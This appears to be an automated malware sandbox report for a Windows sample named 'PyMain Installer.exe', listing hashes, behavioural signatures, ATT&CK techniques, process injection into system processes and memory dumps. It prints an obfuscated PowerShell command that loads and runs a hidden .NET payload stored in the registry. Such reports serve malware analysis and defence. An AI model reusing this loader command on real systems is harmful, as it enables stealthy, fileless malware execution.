1731919d2dc81ad27833aaaf162c923c8c0e9ec12f0517c7db0409b74e9550c6

Analysis

max time kernel
153s
max time network
20s
platform
windows7_x64
resource
win7-20240611-en
resource tags

arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
submitted
01-07-2024 18:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

zvgfd-main/PyMain Installer.exe
Size

163KB
MD5

1a7d1b5d24ba30c4d3d5502295ab5e89
SHA1

2d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256

b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512

859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
SSDEEP

3072:TQpsSyjlzA664oL8tIoDJxGtIVORPrdAHjl3+uwF+iBDZ/wXxnTFKe8kaz:TQpsSyjlzfnoNGxGo6PrdAHwtMxn4e8N

Score

10^/10

evasion

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 2116 created 420 2116 powershell.EXE winlogon.exe
Drops file in System32 directory 1 IoCs

Processes:

powershell.EXE

description ioc process

File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 2116 set thread context of 2604 2116 powershell.EXE dllhost.exe

description	pid	process	target process
PID 2116 created 420	2116	powershell.EXE	winlogon.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

description	pid	process	target process
PID 2116 set thread context of 2604	2116	powershell.EXE	dllhost.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 70431f04e5cbda01	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.EXEdllhost.exe

pid	process
2116	powershell.EXE
2116	powershell.EXE
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.EXEdllhost.exe

description pid process

Token: SeDebugPrivilege 2116 powershell.EXE
Token: SeDebugPrivilege 2116 powershell.EXE
Token: SeDebugPrivilege 2604 dllhost.exe

description	pid	process
Token: SeDebugPrivilege	2116	powershell.EXE
Token: SeDebugPrivilege	2116	powershell.EXE
Token: SeDebugPrivilege	2604	dllhost.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

taskeng.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 2740 wrote to memory of 2116	2740	taskeng.exe	powershell.EXE
PID 2740 wrote to memory of 2116	2740	taskeng.exe	powershell.EXE
PID 2740 wrote to memory of 2116	2740	taskeng.exe	powershell.EXE
PID 2116 wrote to memory of 2604	2116	powershell.EXE	dllhost.exe
PID 2116 wrote to memory of 2604	2116	powershell.EXE	dllhost.exe
PID 2116 wrote to memory of 2604	2116	powershell.EXE	dllhost.exe
PID 2116 wrote to memory of 2604	2116	powershell.EXE	dllhost.exe
PID 2116 wrote to memory of 2604	2116	powershell.EXE	dllhost.exe
PID 2116 wrote to memory of 2604	2116	powershell.EXE	dllhost.exe
PID 2116 wrote to memory of 2604	2116	powershell.EXE	dllhost.exe
PID 2116 wrote to memory of 2604	2116	powershell.EXE	dllhost.exe
PID 2116 wrote to memory of 2604	2116	powershell.EXE	dllhost.exe
PID 2604 wrote to memory of 420	2604	dllhost.exe	winlogon.exe
PID 2604 wrote to memory of 464	2604	dllhost.exe	services.exe
PID 2604 wrote to memory of 480	2604	dllhost.exe	lsass.exe
PID 2604 wrote to memory of 488	2604	dllhost.exe	lsm.exe
PID 2604 wrote to memory of 596	2604	dllhost.exe	svchost.exe
PID 2604 wrote to memory of 676	2604	dllhost.exe	svchost.exe
PID 2604 wrote to memory of 760	2604	dllhost.exe	svchost.exe
PID 2604 wrote to memory of 808	2604	dllhost.exe	svchost.exe
PID 2604 wrote to memory of 844	2604	dllhost.exe	svchost.exe
PID 2604 wrote to memory of 992	2604	dllhost.exe	svchost.exe
PID 2604 wrote to memory of 292	2604	dllhost.exe	svchost.exe
PID 2604 wrote to memory of 284	2604	dllhost.exe	spoolsv.exe
PID 2604 wrote to memory of 1040	2604	dllhost.exe	svchost.exe
PID 2604 wrote to memory of 1128	2604	dllhost.exe	taskhost.exe
PID 2604 wrote to memory of 1236	2604	dllhost.exe	Dwm.exe
PID 2604 wrote to memory of 1284	2604	dllhost.exe	Explorer.EXE
PID 2604 wrote to memory of 2308	2604	dllhost.exe	svchost.exe
PID 2604 wrote to memory of 1356	2604	dllhost.exe	sppsvc.exe
PID 2604 wrote to memory of 2740	2604	dllhost.exe	taskeng.exe
PID 2604 wrote to memory of 2116	2604	dllhost.exe	powershell.EXE
PID 2604 wrote to memory of 1880	2604	dllhost.exe	conhost.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{fa8c5419-55c2-4079-b926-d97bfa942216}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2604

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:676

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
- Modifies security service
PID:760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:808

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
3⤵
PID:1236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
PID:844

C:\Windows\system32\taskeng.exe
taskeng.exe {DE8A4E36-F7A4-4F0D-8834-35DC37671F4E} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'T'+'W'+''+'A'+''+'R'+''+'E'+'').GetValue(''+'$'+''+'7'+''+'7'+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:292

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1040

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:2308

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:1356

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:480

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:488

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1284

C:\Users\Admin\AppData\Local\Temp\zvgfd-main\PyMain Installer.exe
"C:\Users\Admin\AppData\Local\Temp\zvgfd-main\PyMain Installer.exe"
2⤵
PID:928

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1948577710-928674181-339024835713447962-1275170569-509978129-1210196314-792834035"
1⤵
PID:1880

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

memory/420-24-0x0000000000370000-0x0000000000395000-memory.dmp

Filesize
148KB

Download
memory/420-34-0x00000000003A0000-0x00000000003CB000-memory.dmp

Filesize
172KB

Download
memory/420-42-0x00000000003A0000-0x00000000003CB000-memory.dmp

Filesize
172KB

Download
memory/420-26-0x00000000003A0000-0x00000000003CB000-memory.dmp

Filesize
172KB

Download
memory/420-52-0x000007FEBEC30000-0x000007FEBEC40000-memory.dmp

Filesize
64KB

Download
memory/420-53-0x0000000036FC0000-0x0000000036FD0000-memory.dmp

Filesize
64KB

Download
memory/420-25-0x0000000000370000-0x0000000000395000-memory.dmp

Filesize
148KB

Download
memory/420-83-0x0000000076FD1000-0x0000000076FD2000-memory.dmp

Filesize
4KB

Download
memory/464-71-0x0000000036FC0000-0x0000000036FD0000-memory.dmp

Filesize
64KB

Download
memory/464-54-0x0000000000150000-0x000000000017B000-memory.dmp

Filesize
172KB

Download
memory/464-68-0x0000000000150000-0x000000000017B000-memory.dmp

Filesize
172KB

Download
memory/464-70-0x000007FEBEC30000-0x000007FEBEC40000-memory.dmp

Filesize
64KB

Download
memory/480-51-0x0000000000360000-0x000000000038B000-memory.dmp

Filesize
172KB

Download
memory/480-59-0x000007FEBEC30000-0x000007FEBEC40000-memory.dmp

Filesize
64KB

Download
memory/480-61-0x0000000036FC0000-0x0000000036FD0000-memory.dmp

Filesize
64KB

Download
memory/480-82-0x0000000000120000-0x0000000000145000-memory.dmp

Filesize
148KB

Download
memory/480-43-0x0000000000360000-0x000000000038B000-memory.dmp

Filesize
172KB

Download
memory/480-148-0x0000000000120000-0x0000000000145000-memory.dmp

Filesize
148KB

Download
memory/2116-11-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp

Filesize
9.6MB

Download
memory/2116-2-0x0000000000A40000-0x0000000000A48000-memory.dmp

Filesize
32KB

Download
memory/2116-3-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp

Filesize
9.6MB

Download
memory/2116-147-0x000007FEF58CE000-0x000007FEF58CF000-memory.dmp

Filesize
4KB

Download
memory/2116-0-0x000007FEF58CE000-0x000007FEF58CF000-memory.dmp

Filesize
4KB

Download
memory/2116-30-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp

Filesize
9.6MB

Download
memory/2116-146-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp

Filesize
9.6MB

Download
memory/2116-6-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp

Filesize
9.6MB

Download
memory/2116-1-0x0000000019CA0000-0x0000000019F82000-memory.dmp

Filesize
2.9MB

Download
memory/2116-4-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp

Filesize
9.6MB

Download
memory/2116-5-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp

Filesize
9.6MB

Download
memory/2116-10-0x0000000076D60000-0x0000000076E7F000-memory.dmp

Filesize
1.1MB

Download
memory/2116-9-0x0000000076F80000-0x0000000077129000-memory.dmp

Filesize
1.7MB

Download
memory/2116-8-0x0000000000FA0000-0x0000000000FCA000-memory.dmp

Filesize
168KB

Download
memory/2116-7-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp

Filesize
9.6MB

Download
memory/2604-19-0x0000000076F80000-0x0000000077129000-memory.dmp

Filesize
1.7MB

Download
memory/2604-16-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2604-20-0x0000000076D60000-0x0000000076E7F000-memory.dmp

Filesize
1.1MB

Download
memory/2604-21-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2604-93-0x0000000076F80000-0x0000000077129000-memory.dmp

Filesize
1.7MB

Download
memory/2604-92-0x0000000076F81000-0x0000000077082000-memory.dmp

Filesize
1.0MB

Download
memory/2604-14-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2604-18-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2604-12-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2604-13-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2604-149-0x0000000076F80000-0x0000000077129000-memory.dmp

Filesize
1.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads